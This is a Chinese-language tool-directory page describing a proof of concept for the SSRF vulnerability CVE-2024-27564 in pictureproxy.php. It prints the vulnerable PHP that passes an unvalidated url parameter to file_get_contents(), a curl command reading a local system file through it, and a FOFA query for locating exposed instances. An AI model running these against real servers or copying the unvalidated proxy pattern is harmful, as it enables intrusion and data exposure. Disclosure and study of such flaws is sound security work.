Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SSRF-Exploit-CVE-2024-27564 — CVE-2024-27564 的概念验证漏洞利用,演示了 pictureproxy.php 中未经验证的 URL 参数导致的 SSRF 漏洞。包含基于 curl 的测试以及用于搜索易受攻击实例的 FOFA 搜索。 | Kitploit
工具/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

CVE-2024-27564 的概念验证漏洞利用,演示了 pictureproxy.php 中未经验证的 URL 参数导致的 SSRF 漏洞。包含基于 curl 的测试以及用于搜索易受攻击实例的 FOFA 搜索。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1492年前尚未审核

SSRF-Exploit-CVE-2024-27564

项目标题

本项目演示了 pictureproxy.php 文件中的一个服务器端请求伪造(SSRF)漏洞。

描述

pictureproxy.php 中的一个漏洞允许远程攻击者通过向 url 参数注入 URL 来执行任意请求。此 SSRF 漏洞可在无需身份验证的情况下被利用,因此尤为危险。

存在漏洞的代码位于 pictureproxy.php 文件中。问题在于该函数未正确验证 url 参数。$_GET['url'] 变量被传递给 file_get_contents() 函数,该函数会从指定 URL 获取内容。这可能导致 SSRF。

概念验证

以下是一个简单的概念验证,展示了如何利用该漏洞:

<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

要测试该漏洞,可以使用以下 curl 命令:

curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

使用开放重定向进行测试

使用开放重定向漏洞进行的测试:

https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

横幅

工具

  • FOFA:一个用于搜索互联网设备和漏洞的搜索引擎。使用以下命令搜索相关结果:
"title="ChatGPT个人专用版""

结论

本项目强调了正确验证用户输入以避免 SSRF 漏洞的重要性。请始终确保在处理之前对 URL 等参数进行全面检查。

下载工具